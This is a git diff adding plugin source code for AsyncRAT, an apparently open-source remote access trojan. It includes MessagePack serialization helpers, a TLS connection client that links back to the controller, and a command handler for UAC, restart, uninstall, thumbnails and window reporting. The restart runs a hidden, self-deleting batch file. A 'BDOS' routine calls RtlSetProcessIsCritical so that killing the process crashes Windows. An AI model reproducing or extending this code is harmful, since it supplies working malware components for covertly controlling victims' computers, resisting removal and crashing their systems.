+{
+ public enum MsgPackType
+ {
+ Unknown = 0,
+ Null = 1,
+ Map = 2,
+ Array = 3,
+ String = 4,
+ Integer = 5,
+ UInt64 = 6,
+ Boolean = 7,
+ Float = 8,
+ Single = 9,
+ DateTime = 10,
+ Binary = 11
+ }
+}
\ No newline at end of file
diff --git a/AsyncRAT-C#/Plugin/Options/Options/MessagePack/ReadTools.cs b/AsyncRAT-C#/Plugin/Options/Options/MessagePack/ReadTools.cs
new file mode 100644
index 0000000..9e85968
--- /dev/null
+++ b/AsyncRAT-C#/Plugin/Options/Options/MessagePack/ReadTools.cs
@@ -0,0 +1,84 @@
+using System;
+using System.Collections.Generic;
+using System.IO;
+using System.Linq;
+using System.Text;
+using System.Threading.Tasks;
+
+namespace Plugin.MessagePack
+{
+ class ReadTools
+ {
+ public static String ReadString(Stream ms, int len)
+ {
+ byte[] rawBytes = new byte[len];
+ ms.Read(rawBytes, 0, len);
+ return BytesTools.GetString(rawBytes);
+ }
+
+ public static String ReadString(Stream ms)
+ {
+ byte strFlag = (byte)ms.ReadByte();
+ return ReadString(strFlag, ms);
+ }
+
+ public static String ReadString(byte strFlag, Stream ms)
+ {
+ //
+ //fixstr stores a byte array whose length is upto 31 bytes:
+ //+--------+========+
+ //|101XXXXX| data |
+ //+--------+========+
+ //
+ //str 8 stores a byte array whose length is upto (2^8)-1 bytes:
+ //+--------+--------+========+
+ //| 0xd9 |YYYYYYYY| data |
+ //+--------+--------+========+
+ //
+ //str 16 stores a byte array whose length is upto (2^16)-1 bytes:
+ //+--------+--------+--------+========+
+ //| 0xda |ZZZZZZZZ|ZZZZZZZZ| data |
+ //+--------+--------+--------+========+
+ //
+ //str 32 stores a byte array whose length is upto (2^32)-1 bytes:
+ //+--------+--------+--------+--------+--------+========+
+ //| 0xdb |AAAAAAAA|AAAAAAAA|AAAAAAAA|AAAAAAAA| data |
+ //+--------+--------+--------+--------+--------+========+
+ //
+ //where
+ //* XXXXX is a 5-bit unsigned integer which represents N
+ //* YYYYYYYY is a 8-bit unsigned integer which represents N
+ //* ZZZZZZZZ_ZZZZZZZZ is a 16-bit big-endian unsigned integer which represents N
+ //* AAAAAAAA_AAAAAAAA_AAAAAAAA_AAAAAAAA is a 32-bit big-endian unsigned integer which represents N
+ //* N is the length of data
+
+ byte[] rawBytes = null;
+ int len = 0;
+ if ((strFlag >= 0xA0) && (strFlag <= 0xBF))
+ {
+ len = strFlag - 0xA0;
+ }
+ else if (strFlag == 0xD9)
+ {
+ len = ms.ReadByte();
+ }
+ else if (strFlag == 0xDA)
+ {
+ rawBytes = new byte[2];
+ ms.Read(rawBytes, 0, 2);
+ rawBytes = BytesTools.SwapBytes(rawBytes);
+ len = BitConverter.ToUInt16(rawBytes, 0);
+ }
+ else if (strFlag == 0xDB)
+ {
+ rawBytes = new byte[4];
+ ms.Read(rawBytes, 0, 4);
+ rawBytes = BytesTools.SwapBytes(rawBytes);
+ len = BitConverter.ToInt32(rawBytes, 0);
+ }
+ rawBytes = new byte[len];
+ ms.Read(rawBytes, 0, len);
+ return BytesTools.GetString(rawBytes);
+ }
+ }
+}
\ No newline at end of file
diff --git a/AsyncRAT-C#/Plugin/Options/Options/MessagePack/WriteTools.cs b/AsyncRAT-C#/Plugin/Options/Options/MessagePack/WriteTools.cs
new file mode 100644
index 0000000..3de69fa
--- /dev/null
+++ b/AsyncRAT-C#/Plugin/Options/Options/MessagePack/WriteTools.cs
@@ -0,0 +1,199 @@
+using System;
+using System.IO;
+
+namespace Plugin.MessagePack
+{
+ class WriteTools
+ {
+ public static void WriteNull(Stream ms)
+ {
+ ms.WriteByte(0xC0);
+ }
+
+ public static void WriteString(Stream ms, String strVal)
+ {
+ //
+ //fixstr stores a byte array whose length is upto 31 bytes:
+ //+--------+========+
+ //|101XXXXX| data |
+ //+--------+========+
+ //
+ //str 8 stores a byte array whose length is upto (2^8)-1 bytes:
+ //+--------+--------+========+
+ //| 0xd9 |YYYYYYYY| data |
+ //+--------+--------+========+
+ //
+ //str 16 stores a byte array whose length is upto (2^16)-1 bytes:
+ //+--------+--------+--------+========+
+ //| 0xda |ZZZZZZZZ|ZZZZZZZZ| data |
+ //+--------+--------+--------+========+
+ //
+ //str 32 stores a byte array whose length is upto (2^32)-1 bytes:
+ //+--------+--------+--------+--------+--------+========+
+ //| 0xdb |AAAAAAAA|AAAAAAAA|AAAAAAAA|AAAAAAAA| data |
+ //+--------+--------+--------+--------+--------+========+
+ //
+ //where
+ //* XXXXX is a 5-bit unsigned integer which represents N
+ //* YYYYYYYY is a 8-bit unsigned integer which represents N
+ //* ZZZZZZZZ_ZZZZZZZZ is a 16-bit big-endian unsigned integer which represents N
+ //* AAAAAAAA_AAAAAAAA_AAAAAAAA_AAAAAAAA is a 32-bit big-endian unsigned integer which represents N
+ //* N is the length of data
+
+ byte[] rawBytes = BytesTools.GetUtf8Bytes(strVal);
+ byte[] lenBytes = null;
+ int len = rawBytes.Length;
+ byte b = 0;
+ if (len <= 31)
+ {
+ b = (byte)(0xA0 + (byte)len);
+ ms.WriteByte(b);
+ }
+ else if (len <= 255)
+ {
+ b = 0xD9;
+ ms.WriteByte(b);
+ b = (byte)len;
+ ms.WriteByte(b);
+ }
+ else if (len <= 65535)
+ {
+ b = 0xDA;
+ ms.WriteByte(b);
+
+ lenBytes = BytesTools.SwapBytes(BitConverter.GetBytes((Int16)len));
+ ms.Write(lenBytes, 0, lenBytes.Length);
+ }
+ else
+ {
+ b = 0xDB;
+ ms.WriteByte(b);
+
+ lenBytes = BytesTools.SwapBytes(BitConverter.GetBytes((Int32)len));
+ ms.Write(lenBytes, 0, lenBytes.Length);
+ }
+ ms.Write(rawBytes, 0, rawBytes.Length);
+ }
+ public static void WriteBinary(Stream ms, byte[] rawBytes)
+ {
+
+ byte[] lenBytes = null;
+ int len = rawBytes.Length;
+ byte b = 0;
+ if (len <= 255)
+ {
+ b = 0xC4;
+ ms.WriteByte(b);
+ b = (byte)len;
+ ms.WriteByte(b);
+ }
+ else if (len <= 65535)
+ {
+ b = 0xC5;
+ ms.WriteByte(b);
+
+ lenBytes = BytesTools.SwapBytes(BitConverter.GetBytes((Int16)len));
+ ms.Write(lenBytes, 0, lenBytes.Length);
+ }
+ else
+ {
+ b = 0xC6;
+ ms.WriteByte(b);
+
+ lenBytes = BytesTools.SwapBytes(BitConverter.GetBytes((Int32)len));
+ ms.Write(lenBytes, 0, lenBytes.Length);
+ }
+ ms.Write(rawBytes, 0, rawBytes.Length);
+ }
+
+ public static void WriteFloat(Stream ms, Double fVal)
+ {
+ ms.WriteByte(0xCB);
+ ms.Write(BytesTools.SwapDouble(fVal), 0, 8);
+ }
+
+ public static void WriteSingle(Stream ms, Single fVal)
+ {
+ ms.WriteByte(0xCA);
+ ms.Write(BytesTools.SwapBytes(BitConverter.GetBytes(fVal)), 0, 4);
+ }
+
+ public static void WriteBoolean(Stream ms, Boolean bVal)
+ {
+ if (bVal)
+ {
+ ms.WriteByte(0xC3);
+ }
+ else
+ {
+ ms.WriteByte(0xC2);
+ }
+ }
+
+
+ public static void WriteUInt64(Stream ms, UInt64 iVal)
+ {
+ ms.WriteByte(0xCF);
+ byte[] dataBytes = BitConverter.GetBytes(iVal);
+ ms.Write(BytesTools.SwapBytes(dataBytes), 0, 8);
+ }
+
+ public static void WriteInteger(Stream ms, Int64 iVal)
+ {
+ if (iVal >= 0)
+ { // 正数
+ if (iVal <= 127)
+ {
+ ms.WriteByte((byte)iVal);
+ }
+ else if (iVal <= 255)
+ { //UInt8
+ ms.WriteByte(0xCC);
+ ms.WriteByte((byte)iVal);
+ }
+ else if (iVal <= (UInt32)0xFFFF)
+ { //UInt16
+ ms.WriteByte(0xCD);
+ ms.Write(BytesTools.SwapInt16((Int16)iVal), 0, 2);
+ }
+ else if (iVal <= (UInt32)0xFFFFFFFF)
+ { //UInt32
+ ms.WriteByte(0xCE);
+ ms.Write(BytesTools.SwapInt32((Int32)iVal), 0, 4);
+ }
+ else
+ { //Int64
+ ms.WriteByte(0xD3);
+ ms.Write(BytesTools.SwapInt64(iVal), 0, 8);
+ }
+ }
+ else
+ { // <0
+ if (iVal <= Int32.MinValue) //-2147483648 // 64 bit
+ {
+ ms.WriteByte(0xD3);
+ ms.Write(BytesTools.SwapInt64(iVal), 0, 8);
+ }
+ else if (iVal <= Int16.MinValue) // -32768 // 32 bit
+ {
+ ms.WriteByte(0xD2);
+ ms.Write(BytesTools.SwapInt32((Int32)iVal), 0, 4);
+ }
+ else if (iVal <= -128) // -32768 // 32 bit
+ {
+ ms.WriteByte(0xD1);
+ ms.Write(BytesTools.SwapInt16((Int16)iVal), 0, 2);
+ }
+ else if (iVal <= -32)
+ {
+ ms.WriteByte(0xD0);
+ ms.WriteByte((byte)iVal);
+ }
+ else
+ {
+ ms.WriteByte((byte)iVal);
+ }
+ } // end <0
+ }
+ }
+}
\ No newline at end of file
diff --git a/AsyncRAT-C#/Plugin/Options/Options/Methods.cs b/AsyncRAT-C#/Plugin/Options/Options/Methods.cs
new file mode 100644
index 0000000..237f2b4
--- /dev/null
+++ b/AsyncRAT-C#/Plugin/Options/Options/Methods.cs
@@ -0,0 +1,66 @@
+using Microsoft.Win32;
+using System;
+using System.Collections.Generic;
+using System.Diagnostics;
+using System.Linq;
+using System.Runtime.InteropServices;
+using System.Security.Principal;
+using System.Text;
+using System.Threading;
+
+namespace Plugin
+{
+ public static class Methods
+ {
+ public static void ClientExit()
+ {
+ try
+ {
+ if (Convert.ToBoolean(Plugin.BDOS) && IsAdmin())
+ ProcessCriticalExit();
+ CloseMutex();
+ Connection.SslClient?.Close();
+ Connection.TcpClient?.Close();
+ }
+ catch { }
+ }
+
+ public static bool IsAdmin()
+ {
+ return new WindowsPrincipal(WindowsIdentity.GetCurrent()).IsInRole(WindowsBuiltInRole.Administrator);
+ }
+
+ public static void CloseMutex()
+ {
+ if (Plugin.AppMutex != null)
+ {
+ Plugin.AppMutex.Close();
+ Plugin.AppMutex = null;
+ }
+ }
+
+ public static void SystemEvents_SessionEnding(object sender, SessionEndingEventArgs e)
+ {
+ if (Convert.ToBoolean(Plugin.BDOS) && Methods.IsAdmin())
+ ProcessCriticalExit();
+ }
+
+ public static void ProcessCriticalExit()
+ {
+ try
+ {
+ RtlSetProcessIsCritical(0, 0, 0);
+ }
+ catch
+ {
+ while (true)
+ {
+ Thread.Sleep(100000); //prevents a BSOD on exit failure
+ }
+ }
+ }
+
+ [DllImport("ntdll.dll", SetLastError = true)]
+ private static extern void RtlSetProcessIsCritical(UInt32 v1, UInt32 v2, UInt32 v3);
+ }
+}
diff --git a/AsyncRAT-C#/Plugin/Options/Options/Options.csproj b/AsyncRAT-C#/Plugin/Options/Options/Options.csproj
new file mode 100644
index 0000000..2b71e55
--- /dev/null
+++ b/AsyncRAT-C#/Plugin/Options/Options/Options.csproj
@@ -0,0 +1,62 @@
+
+
+
+
+ Debug
+ AnyCPU
+ {6AA4E392-AAAF-4408-B550-85863DD4BAAF}
+ Library
+ Properties
+ Plugin
+ Options
+ v4.0
+ 512
+ true
+
+
+ true
+ full
+ false
+ ..\..\..\Binaries\Debug\Plugins\
+ DEBUG;TRACE
+ prompt
+ 4
+
+
+ none
+ true
+ ..\..\..\Binaries\Release\Plugins\
+ TRACE
+ prompt
+ 4
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
\ No newline at end of file
diff --git a/AsyncRAT-C#/Plugin/Options/Options/Packet.cs b/AsyncRAT-C#/Plugin/Options/Options/Packet.cs
new file mode 100644
index 0000000..d8d51fd
--- /dev/null
+++ b/AsyncRAT-C#/Plugin/Options/Options/Packet.cs
@@ -0,0 +1,114 @@
+using Plugin.Handler;
+using Plugin.MessagePack;
+using System;
+using System.Collections.Generic;
+using System.Diagnostics;
+using System.IO;
+using System.Linq;
+using System.Management;
+using System.Runtime.InteropServices;
+using System.Text;
+using System.Threading;
+using System.Windows.Forms;
+
+namespace Plugin
+{
+ public static class Packet
+ {
+ public static CancellationTokenSource ctsReportWindow;
+ public static CancellationTokenSource ctsThumbnails;
+
+ public static void Read(object data)
+ {
+ try
+ {
+ MsgPack unpack_msgpack = new MsgPack();
+ unpack_msgpack.DecodeFromBytes((byte[])data);
+ switch (unpack_msgpack.ForcePathObject("Packet").AsString)
+ {
+ case "uac":
+ {
+ new HandleUAC();
+ Connection.Disconnected();
+ break;
+ }
+
+ case "close":
+ {
+ Methods.ClientExit();
+ Environment.Exit(0);
+ break;
+ }
+
+ case "restart":
+ {
+ Methods.ClientExit();
+ string batch = Path.GetTempFileName() + ".bat";
+ using (StreamWriter sw = new StreamWriter(batch))
+ {
+ sw.WriteLine("@echo off");
+ sw.WriteLine("timeout 3 > NUL");
+ sw.WriteLine("START " + "\"" + "\" " + "\"" + Application.ExecutablePath + "\"");
+ sw.WriteLine("CD " + Path.GetTempPath());
+ sw.WriteLine("DEL " + "\"" + Path.GetFileName(batch) + "\"" + " /f /q");
+ }
+ Process.Start(new ProcessStartInfo()
+ {
+ FileName = batch,
+ CreateNoWindow = true,
+ ErrorDialog = false,
+ UseShellExecute = false,
+ WindowStyle = ProcessWindowStyle.Hidden
+ });
+ Environment.Exit(0);
+ break;
+ }
+
+ case "uninstall":
+ {
+ new HandleUninstall();
+ break;
+ }
+
+ case "pcOptions":
+ {
+ new HandlePcOptions(unpack_msgpack.ForcePathObject("Option").AsString);
+ break;
+ }
+
+ case "thumbnails":
+ {
+ new HandleThumbnails();
+ break;
+ }
+
+ case "thumbnailsStop":
+ {
+ ctsThumbnails?.Cancel();
+ break;
+ }
+
+ case "reportWindow":
+ {
+ new HandleReportWindow(unpack_msgpack);
+ break;
+ }
+
+
+ }
+ }
+ catch (Exception ex)
+ {
+ Error(ex.Message);
+ }
+ }
+ public static void Error(string ex)
+ {
+ MsgPack msgpack = new MsgPack();
+ msgpack.ForcePathObject("Packet").AsString = "Error";
+ msgpack.ForcePathObject("Error").AsString = ex;
+ Connection.Send(msgpack.Encode2Bytes());
+ }
+ }
+
+}
\ No newline at end of file
diff --git a/AsyncRAT-C#/Plugin/Options/Options/Plugin.cs b/AsyncRAT-C#/Plugin/Options/Options/Plugin.cs
new file mode 100644
index 0000000..5bc9da7
--- /dev/null
+++ b/AsyncRAT-C#/Plugin/Options/Options/Plugin.cs
@@ -0,0 +1,45 @@
+using Plugin.MessagePack;
+using System;
+using System.Collections.Generic;
+using System.Diagnostics;
+using System.Linq;
+using System.Net.Security;
+using System.Net.Sockets;
+using System.Security.Cryptography.X509Certificates;
+using System.Text;
+using System.Threading;
+
+namespace Plugin
+{
+ public class Plugin
+ {
+ public static Socket Socket;
+ public static Mutex AppMutex;
+ public static string Mutex;
+ public static string BDOS;
+ public static string Install;
+ public static string InstallFile;
+
+ public void Run(Socket socket, X509Certificate2 certificate, string hwid, byte[] msgPack, Mutex mutex, string mtx, string bdos, string install, string installFile)
+ {
+ Debug.WriteLine("Plugin Invoked");
+ AppMutex = mutex;
+ Mutex = mtx;
+ BDOS = bdos;
+ Install = install;
+ InstallFile = installFile;
+ Socket = socket;
+ Connection.ServerCertificate = certificate;
+ Connection.Hwid = hwid;
+ new Thread(() =>
+ {
+ Connection.InitializeClient(msgPack);
+ }).Start();
+
+ while (Connection.IsConnected)
+ {
+ Thread.Sleep(1000);
+ }
+ }
+ }
+}
diff --git a/AsyncRAT-C#/Plugin/Options/Options/Properties/AssemblyInfo.cs b/AsyncRAT-C#/Plugin/Options/Options/Properties/AssemblyInfo.cs
new file mode 100644
index 0000000..dcfd11e
--- /dev/null
+++ b/AsyncRAT-C#/Plugin/Options/Options/Properties/AssemblyInfo.cs
@@ -0,0 +1,36 @@
+using System.Reflection;
+using System.Runtime.CompilerServices;
+using System.Runtime.InteropServices;
+
+// General Information about an assembly is controlled through the following
+// set of attributes. Change these attribute values to modify the information
+// associated with an assembly.
+[assembly: AssemblyTitle("")]
+[assembly: AssemblyDescription("")]
+[assembly: AssemblyConfiguration("")]
+[assembly: AssemblyCompany("")]
+[assembly: AssemblyProduct("")]
+[assembly: AssemblyCopyright("")]
+[assembly: AssemblyTrademark("")]
+[assembly: AssemblyCulture("")]
+
+// Setting ComVisible to false makes the types in this assembly not visible
+// to COM components. If you need to access a type in this assembly from
+// COM, set the ComVisible attribute to true on that type.
+[assembly: ComVisible(false)]
+
+// The following GUID is for the ID of the typelib if this project is exposed to COM
+//[assembly: Guid("6aa4e392-aaaf-4408-b550-85863dd4baaf")]
+
+// Version information for an assembly consists of the following four values:
+//
+// Major Version
+// Minor Version
+// Build Number
+// Revision
+//
+// You can specify all the values or you can default the Build and Revision Numbers
+// by using the '*' as shown below:
+// [assembly: AssemblyVersion("1.0.*")]
+[assembly: AssemblyVersion("1.0.0.0")]
+[assembly: AssemblyFileVersion("1.0.0.0")]
diff --git a/AsyncRAT-C#/Plugin/ProcessManager/ProcessManager.sln b/AsyncRAT-C#/Plugin/ProcessManager/ProcessManager.sln
new file mode 100644
index 0000000..25dc354
--- /dev/null
+++ b/AsyncRAT-C#/Plugin/ProcessManager/ProcessManager.sln
@@ -0,0 +1,25 @@
+
+Microsoft Visual Studio Solution File, Format Version 12.00
+# Visual Studio Version 16
+VisualStudioVersion = 16.0.29123.88
+MinimumVisualStudioVersion = 10.0.40219.1
+Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "ProcessManager", "ProcessManager\ProcessManager.csproj", "{D640C36B-2C66-449B-A145-EB98322A67C8}"
+EndProject
+Global
+ GlobalSection(SolutionConfigurationPlatforms) = preSolution
+ Debug|Any CPU = Debug|Any CPU
+ Release|Any CPU = Release|Any CPU
+ EndGlobalSection
+ GlobalSection(ProjectConfigurationPlatforms) = postSolution
+ {D640C36B-2C66-449B-A145-EB98322A67C8}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
+ {D640C36B-2C66-449B-A145-EB98322A67C8}.Debug|Any CPU.Build.0 = Debug|Any CPU
+ {D640C36B-2C66-449B-A145-EB98322A67C8}.Release|Any CPU.ActiveCfg = Release|Any CPU
+ {D640C36B-2C66-449B-A145-EB98322A67C8}.Release|Any CPU.Build.0 = Release|Any CPU
+ EndGlobalSection
+ GlobalSection(SolutionProperties) = preSolution
+ HideSolutionNode = FALSE
+ EndGlobalSection
+ GlobalSection(ExtensibilityGlobals) = postSolution
+ SolutionGuid = {C9F86219-B52B-4BDB-AE41-C0B5E74ADC63}
+ EndGlobalSection
+EndGlobal
diff --git a/AsyncRAT-C#/Plugin/ProcessManager/ProcessManager/Connection.cs b/AsyncRAT-C#/Plugin/ProcessManager/ProcessManager/Connection.cs
new file mode 100644
index 0000000..97894b0
--- /dev/null
+++ b/AsyncRAT-C#/Plugin/ProcessManager/ProcessManager/Connection.cs
@@ -0,0 +1,211 @@
+using Plugin.MessagePack;
+using System;
+using System.Collections.Generic;
+using System.Diagnostics;
+using System.IO;
+using System.Linq;
+using System.Net.Security;
+using System.Net.Sockets;
+using System.Security.Authentication;
+using System.Security.Cryptography.X509Certificates;
+using System.Text;
+using System.Threading;
+
+namespace Plugin
+{
+ public static class Connection
+ {
+ public static Socket TcpClient { get; set; }
+ public static SslStream SslClient { get; set; }
+ public static X509Certificate2 ServerCertificate { get; set; }
+ private static byte[] Buffer { get; set; }
+ private static long Buffersize { get; set; }
+ private static Timer Tick { get; set; }
+ private static MemoryStream MS { get; set; }
+ public static bool IsConnected { get; set; }
+ private static object SendSync { get; } = new object();
+ public static string Hwid { get; set; }
+
+ public static void InitializeClient()
+ {
+ try
+ {
+
+ TcpClient = new Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp)
+ {
+ ReceiveBufferSize = 50 * 1024,
+ SendBufferSize = 50 * 1024,
+ };
+
+ TcpClient.Connect(Plugin.Socket.RemoteEndPoint.ToString().Split(':')[0], Convert.ToInt32(Plugin.Socket.RemoteEndPoint.ToString().Split(':')[1]));
+ if (TcpClient.Connected)
+ {
+ Debug.WriteLine("Plugin Connected!");
+ IsConnected = true;
+ SslClient = new SslStream(new NetworkStream(TcpClient, true), false, ValidateServerCertificate);
+ SslClient.AuthenticateAsClient(TcpClient.RemoteEndPoint.ToString().Split(':')[0], null, SslProtocols.Tls, false);
+ Buffer = new byte[4];
+ MS = new MemoryStream();
+ Tick = new Timer(new TimerCallback(CheckServer), null, new Random().Next(15 * 1000, 30 * 1000), new Random().Next(15 * 1000, 30 * 1000));
+ SslClient.BeginRead(Buffer, 0, Buffer.Length, ReadServertData, null);
+
+ new Thread(() =>
+ {
+ new HandleProcessManager().ProcessList();
+ }).Start();
+
+ }
+ else
+ {
+ IsConnected = false;
+ return;
+ }
+ }
+ catch
+ {
+ Debug.WriteLine("Disconnected!");
+ IsConnected = false;
+ return;
+ }
+ }
+
+ private static bool ValidateServerCertificate(object sender, X509Certificate certificate, X509Chain chain, SslPolicyErrors sslPolicyErrors)
+ {
+#if DEBUG
+ return true;
+#endif
+ return ServerCertificate.Equals(certificate);
+ }
+
+ public static void Disconnected()
+ {
+
+ try
+ {
+ IsConnected = false;
+ Tick?.Dispose();
+ SslClient?.Dispose();
+ TcpClient?.Dispose();
+ MS?.Dispose();
+ GC.Collect();
+ }
+ catch { }
+ }
+
+ public static void ReadServertData(IAsyncResult ar)
+ {
+ try
+ {
+ if (!TcpClient.Connected || !IsConnected)
+ {
+ IsConnected = false;
+ return;
+ }
+ int recevied = SslClient.EndRead(ar);
+ if (recevied > 0)
+ {
+ MS.Write(Buffer, 0, recevied);
+ if (MS.Length == 4)
+ {
+ Buffersize = BitConverter.ToInt32(MS.ToArray(), 0);
+ Debug.WriteLine("/// Plugin Buffersize " + Buffersize.ToString() + " Bytes ///");
+ MS.Dispose();
+ MS = new MemoryStream();
+ if (Buffersize > 0)
+ {
+ Buffer = new byte[Buffersize];
+ while (MS.Length != Buffersize)
+ {
+ int rc = SslClient.Read(Buffer, 0, Buffer.Length);
+ if (rc == 0)
+ {
+ IsConnected = false;
+ return;
+ }
+ MS.Write(Buffer, 0, rc);
+ Buffer = new byte[Buffersize - MS.Length];
+ }
+ if (MS.Length == Buffersize)
+ {
+ Thread thread = new Thread(new ParameterizedThreadStart(Packet.Read));
+ thread.Start(MS.ToArray());
+ Buffer = new byte[4];
+ MS.Dispose();
+ MS = new MemoryStream();
+ }
+ }
+ }
+ SslClient.BeginRead(Buffer, 0, Buffer.Length, ReadServertData, null);
+ }
+ else
+ {
+ IsConnected = false;
+ return;
+ }
+ }
+ catch
+ {
+ IsConnected = false;
+ return;
+ }
+ }
+
+ public static void Send(byte[] msg)
+ {
+ lock (SendSync)
+ {
+ try
+ {
+ if (!IsConnected || msg == null)
+ {
+ return;
+ }
+
+ byte[] buffersize = BitConverter.GetBytes(msg.Length);
+ TcpClient.Poll(-1, SelectMode.SelectWrite);
+ SslClient.Write(buffersize, 0, buffersize.Length);
+
+ if (msg.Length > 1000000) //1mb
+ {
+ int chunkSize = 50 * 1024;
+ byte[] chunk = new byte[chunkSize];
+ using (MemoryStream buffereReader = new MemoryStream(msg))
+ {
+ BinaryReader binaryReader = new BinaryReader(buffereReader);
+ int bytesToRead = (int)buffereReader.Length;
+ do
+ {
+ chunk = binaryReader.ReadBytes(chunkSize);
+ bytesToRead -= chunkSize;
+ SslClient.Write(chunk, 0, chunk.Length);
+ SslClient.Flush();
+ } while (bytesToRead > 0);
+
+ binaryReader.Dispose();
+ }
+ }
+ else
+ {
+ SslClient.Write(msg, 0, msg.Length);
+ SslClient.Flush();
+ }
+ Debug.WriteLine("Plugin Packet Sent");
+ }
+ catch
+ {
+ IsConnected = false;
+ return;
+ }
+ }
+ }
+
+ public static void CheckServer(object obj)
+ {
+ MsgPack msgpack = new MsgPack();
+ msgpack.ForcePathObject("Packet").AsString = "Ping!)";
+ Send(msgpack.Encode2Bytes());
+ GC.Collect();
+ }
+
+ }
+}
diff --git a/AsyncRAT-C#/Plugin/ProcessManager/ProcessManager/MessagePack/BytesTools.cs b/AsyncRAT-C#/Plugin/ProcessManager/ProcessManager/MessagePack/BytesTools.cs
new file mode 100644
index 0000000..bd66e46
--- /dev/null
+++ b/AsyncRAT-C#/Plugin/ProcessManager/ProcessManager/MessagePack/BytesTools.cs
@@ -0,0 +1,102 @@
+using System;
+using System.Collections.Generic;
+using System.Linq;
+using System.Text;
+using System.Threading.Tasks;
+
+namespace Plugin.MessagePack
+{
+ public class BytesTools
+ {
+ static UTF8Encoding utf8Encode = new UTF8Encoding();
+
+ public static byte[] GetUtf8Bytes(String s)
+ {
+
+ return utf8Encode.GetBytes(s);
+ }
+
+ public static String GetString(byte[] utf8Bytes)
+ {
+ return utf8Encode.GetString(utf8Bytes);
+ }
+
+ public static String BytesAsString(byte[] bytes)
+ {
+ StringBuilder sb = new StringBuilder();
+ foreach (byte b in bytes)
+ {
+ sb.Append(String.Format("{0:D3} ", b));
+ }
+ return sb.ToString();
+ }
+
+
+ public static String BytesAsHexString(byte[] bytes)
+ {
+ StringBuilder sb = new StringBuilder();
+ foreach (byte b in bytes)
+ {
+ sb.Append(String.Format("{0:X2} ", b));
+ }
+ return sb.ToString();
+ }
+
+ ///
+ /// 交换byte数组数据
+ /// 可用于高低数据交换
+ ///
+ /// 要交换的byte数组
+ /// 返回交换后的数据
+ public static byte[] SwapBytes(byte[] v)
+ {
+ byte[] r = new byte[v.Length];
+ int j = v.Length - 1;
+ for (int i = 0; i < r.Length; i++)
+ {
+ r[i] = v[j];
+ j--;
+ }
+ return r;
+ }
+
+ public static byte[] SwapInt64(Int64 v)
+ {
+ //byte[] r = new byte[8];
+ //r[7] = (byte)v;
+ //r[6] = (byte)(v >> 8);
+ //r[5] = (byte)(v >> 16);
+ //r[4] = (byte)(v >> 24);
+ //r[3] = (byte)(v >> 32);
+ //r[2] = (byte)(v >> 40);
+ //r[1] = (byte)(v >> 48);
+ //r[0] = (byte)(v >> 56);
+ return SwapBytes(BitConverter.GetBytes(v));
+ }
+
+ public static byte[] SwapInt32(Int32 v)
+ {
+ byte[] r = new byte[4];
+ r[3] = (byte)v;
+ r[2] = (byte)(v >> 8);
+ r[1] = (byte)(v >> 16);
+ r[0] = (byte)(v >> 24);
+ return r;
+ }
+
+
+ public static byte[] SwapInt16(Int16 v)
+ {
+ byte[] r = new byte[2];
+ r[1] = (byte)v;
+ r[0] = (byte)(v >> 8);
+ return r;
+ }
+
+ public static byte[] SwapDouble(Double v)
+ {
+ return SwapBytes(BitConverter.GetBytes(v));
+ }
+
+ }
+}
\ No newline at end of file
diff --git a/AsyncRAT-C#/Plugin/ProcessManager/ProcessManager/MessagePack/MsgPack.cs b/AsyncRAT-C#/Plugin/ProcessManager/ProcessManager/MessagePack/MsgPack.cs
new file mode 100644
index 0000000..131eb37
--- /dev/null
+++ b/AsyncRAT-C#/Plugin/ProcessManager/ProcessManager/MessagePack/MsgPack.cs
@@ -0,0 +1,926 @@
+using System;
+using System.Collections;
+using System.Collections.Generic;
+using System.IO;
+using System.Linq;
+using System.Text;
+using System.Threading.Tasks;
+
+
+namespace Plugin.MessagePack
+{
+ public class MsgPackEnum : IEnumerator
+ {
+ List children;
+ int position = -1;
+
+ public MsgPackEnum(List obj)
+ {
+ children = obj;
+ }
+ object IEnumerator.Current
+ {
+ get { return children[position]; }
+ }
+
+ bool IEnumerator.MoveNext()
+ {
+ position++;
+ return (position < children.Count);
+ }
+
+ void IEnumerator.Reset()
+ {
+ position = -1;
+ }
+
+ }
+
+ public class MsgPackArray
+ {
+ List children;
+ MsgPack owner;
+
+ public MsgPackArray(MsgPack msgpackObj, List listObj)
+ {
+ owner = msgpackObj;
+ children = listObj;
+ }
+
+ public MsgPack Add()
+ {
+ return owner.AddArrayChild();
+ }
+
+ public MsgPack Add(String value)
+ {
+ MsgPack obj = owner.AddArrayChild();
+ obj.AsString = value;
+ return obj;
+ }
+
+ public MsgPack Add(Int64 value)
+ {
+ MsgPack obj = owner.AddArrayChild();
+ obj.SetAsInteger(value);
+ return obj;
+ }
+
+ public MsgPack Add(Double value)
+ {
+ MsgPack obj = owner.AddArrayChild();
+ obj.SetAsFloat(value);
+ return obj;
+ }
+
+ public MsgPack this[int index]
+ {
+ get { return children[index]; }
+ }
+
+ public int Length
+ {
+ get { return children.Count; }
+ }
+ }
+
+ public class MsgPack : IEnumerable
+ {
+ string name;
+ string lowerName;
+ object innerValue;
+ MsgPackType valueType;
+ MsgPack parent;
+ List children = new List();
+ MsgPackArray refAsArray = null;
+
+ private void SetName(string value)
+ {
+ this.name = value;
+ this.lowerName = name.ToLower();
+ }
+
+ private void Clear()
+ {
+ for (int i = 0; i < children.Count; i++)
+ {
+ ((MsgPack)children[i]).Clear();
+ }
+ children.Clear();
+ }
+
+ private MsgPack InnerAdd()
+ {
+ MsgPack r = new MsgPack();
+ r.parent = this;
+ this.children.Add(r);
+ return r;
+ }
+
+ private int IndexOf(string name)
+ {
+ int i = -1;
+ int r = -1;
+
+ string tmp = name.ToLower();
+ foreach (MsgPack item in children)
+ {
+ i++;
+ if (tmp.Equals(item.lowerName))
+ {
+ r = i;
+ break;
+ }
+ }
+ return r;
+ }
+
+ public MsgPack FindObject(string name)
+ {
+ int i = IndexOf(name);
+ if (i == -1)
+ {
+ return null;
+ }
+ else
+ {
+ return this.children[i];
+ }
+ }
+
+
+ private MsgPack InnerAddMapChild()
+ {
+ if (valueType != MsgPackType.Map)
+ {
+ Clear();
+ this.valueType = MsgPackType.Map;
+ }
+ return InnerAdd();
+ }
+
+ private MsgPack InnerAddArrayChild()
+ {
+ if (valueType != MsgPackType.Array)
+ {
+ Clear();
+ this.valueType = MsgPackType.Array;
+ }
+ return InnerAdd();
+ }
+
+ public MsgPack AddArrayChild()
+ {
